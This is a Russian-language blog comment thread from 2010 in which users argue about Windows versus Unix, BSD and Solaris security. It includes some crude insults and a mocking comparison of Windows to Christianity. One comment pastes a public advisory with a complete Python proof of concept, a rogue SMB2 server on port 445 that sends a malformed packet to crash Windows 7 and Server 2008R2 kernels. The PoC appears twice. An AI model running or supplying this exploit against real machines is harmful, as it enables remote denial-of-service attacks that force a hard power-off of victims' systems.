о, да... слышен глас "специалиста"... просветите меня, о великий гуру, в каком месте она "дырявое говно", и что есть "недырявое неговно". про никсы и бсд можете не рассказывать, опен солярис как настолькая операционка - бред. макось? да нахрен... что-то больше ничего в голову не приходит. или real programmers code binary, и настолько суровы, что им хватает ДОСа?
:) Я хорошо помню, как, получив спамное письмо в Outlook Express, из-за какой-то дырки в разборе HTML письма (возможно IFRAME), что-то в тихую поставилось и начало рассылать спам. Я нигде не кликал, никаких приложений из письма не открывал, только и успел получить его и посмотреть. На такие дырки грех не ставить обновления, как они появляются. Конечно, кривым рукам даже обновления и дополнительный антивирусный софт могут не помочь - они сами все сломают.
да я запросто расскажу, только вы мне скажите для начала, виннюку то уже починили? а то что то выходят кучи мегобайт секурити апдейтов, а толку ноль. я вот про это http://www.thevista.ru/page.php?id=12071 что то уже месяца 2 чинят:)) а то что вы не освоили никсы, ну что ж вы тупы:) я вот в виндавсе только игры ставлю и играю. всё остальное гораздо удобнее, надёжнее, быстрее и проще в никсах.
да где то в дебрях жж встречала пост, человек парсил какие то либы виндовые, и был найден код бсд, без копирайта. причом бсд лицензия то ничего кроме " ставь копирайт и юзай как хочешь" не требует. но ms и это влом видимо:) а вообще я виндовс сравниваю с христианством. такой же развод на лоха. один выход вин7 с ядром от висты чего стоит бггг, хотя хомячки довольны и не вникают в подробности того, что посути ms поменяли только юзерлэнд, с ядром заморачиваца не стали, оставили версию 6 от висты.
кстати, а чего вы так прям подчеркнули - солярис как десктоп бред? чем солярис отличается от других никсов глобально, например от макоси? solaris как и Macosx, как и freebsd\netbsd\openbsd\fragonfle как и некоторые дистры linux это bsd style init. солярис и макось вообще напрямую связаны с бсд.
тем что, насколько я понимаю, для того чтоб установить и настроить именно десктопный вариант (всякие офисы, картинкосмотрелки, музыкоигралки и конопоказывалки :), придется потрахаться вполне изрядно, +не уверен в поддержке массового настольного железа типа звуковух и видюх от AMD и nVidia. Но это мое мнение, возможно неправильное, потому что солярис я руками не щупал пока. Солярис от бсд может отличаться разве что более ориентированной на человека, а не на гуманоида с головой размером с дом установкой. с фряхой я как-то имел дело - так даже ранние релизы линуха в настройке и конфигуровании поеврнуты к пользователю не жопой, а лицом. потому что (просто мое имхо) ковырять руками тонны инишников и собирать софт из сорсов - удел гиков, а нормальным людям решать проблемы, при этом возникающие, нафиг не интересно.
I. VULNERABILITY ------------------------- Windows 7 * , Server 2008R2 Remote Kernel Crash
II. BACKGROUND ------------------------- #FAIL,#FAIL,#FAIL SDL FAIL, 'Most Secure Os Ever' --> Remote Kernel in 2 mn. #FAIL,#FAIL,#FAIL
III. DESCRIPTION ------------------------- See : http://g-laurent.blogspot.com/ for much more details
#Comment: This bug is specific Windows 7/2008R2.
IV. PROOF OF CONCEPT ------------------------- #win7-crash.py: #Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop) #Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop. #NO BSOD, YOU GOTTA PULL THE PLUG. #To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash #Author: Laurent Gaffié #
import SocketServer
packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a.. "\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41" "\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00" "\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01" "\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20" "\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e" "\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")
а что, эта уязвимость где-то массово проявляется, и вызывает волну жалоб енд-юзеров? нет? ой, а нахрена её тогда спешно фиксить, когда куча других критов висит?
no subject
Date: 2010-01-16 10:16 pm (UTC)no subject
Date: 2010-01-16 10:18 pm (UTC)no subject
Date: 2010-01-16 11:26 pm (UTC)Я нигде не кликал, никаких приложений из письма не открывал, только и успел получить его и посмотреть. На такие дырки грех не ставить обновления, как они появляются. Конечно, кривым рукам даже обновления и дополнительный антивирусный софт могут не помочь - они сами все сломают.
no subject
Date: 2010-01-17 01:06 am (UTC)я вот про это http://www.thevista.ru/page.php?id=12071
что то уже месяца 2 чинят:))
а то что вы не освоили никсы, ну что ж вы тупы:)
я вот в виндавсе только игры ставлю и играю. всё остальное гораздо удобнее, надёжнее, быстрее и проще в никсах.
no subject
Date: 2010-01-17 01:08 am (UTC)no subject
Date: 2010-01-17 01:13 am (UTC)no subject
Date: 2010-01-17 01:16 am (UTC)no subject
Date: 2010-01-17 01:26 am (UTC)а вообще я виндовс сравниваю с христианством. такой же развод на лоха.
один выход вин7 с ядром от висты чего стоит бггг, хотя хомячки довольны и не вникают в подробности того, что посути ms поменяли только юзерлэнд, с ядром заморачиваца не стали, оставили версию 6 от висты.
(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:no subject
Date: 2010-01-17 01:07 am (UTC)no subject
Date: 2010-01-17 01:10 am (UTC)ну тыпые, чо с них взять, и фильму план9 не смотрели:)
no subject
Date: 2010-01-17 01:19 am (UTC)чем солярис отличается от других никсов глобально, например от макоси? solaris как и Macosx, как и freebsd\netbsd\openbsd\fragonfle как и некоторые дистры linux это bsd style init. солярис и макось вообще напрямую связаны с бсд.
no subject
Date: 2010-01-17 06:52 am (UTC)no subject
Date: 2010-01-17 10:49 pm (UTC)no subject
Date: 2010-01-16 10:19 pm (UTC)no subject
Date: 2010-01-17 01:11 am (UTC)no subject
Date: 2010-01-17 01:16 am (UTC)no subject
Date: 2010-01-17 01:21 am (UTC)no subject
Date: 2010-01-17 01:29 am (UTC)no subject
Date: 2010-01-17 01:30 am (UTC)(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:отвеччаю вам последний...
From:Re: отвеччаю вам последний...
From:вот вам если вы ленивый такой
From:Re: вот вам если вы ленивый такой
From:Re: вот вам если вы ленивый такой
From:Re: вот вам если вы ленивый такой
From:Re: вот вам если вы ленивый такой
From:Re: отвеччаю вам последний...
From:Re: отвеччаю вам последний...
From:(no subject)
From:no subject
Date: 2010-01-17 01:32 am (UTC)-------------------------
Windows 7 * , Server 2008R2 Remote Kernel Crash
II. BACKGROUND
-------------------------
#FAIL,#FAIL,#FAIL
SDL FAIL, 'Most Secure Os Ever' --> Remote Kernel in 2 mn.
#FAIL,#FAIL,#FAIL
III. DESCRIPTION
-------------------------
See : http://g-laurent.blogspot.com/ for much more details
#Comment: This bug is specific Windows 7/2008R2.
IV. PROOF OF CONCEPT
-------------------------
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#
import SocketServer
packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")
class SMB2(SocketServer.BaseRequestHandler):
def handle(self):
print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()
launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()
(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:no subject
Date: 2010-01-17 07:19 am (UTC)no subject
Date: 2010-01-17 01:56 pm (UTC)no subject
Date: 2010-01-17 11:14 pm (UTC)всё таки значит висит куча других помимо бгг
no subject
Date: 2010-01-18 10:53 am (UTC)(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From:(no subject)
From: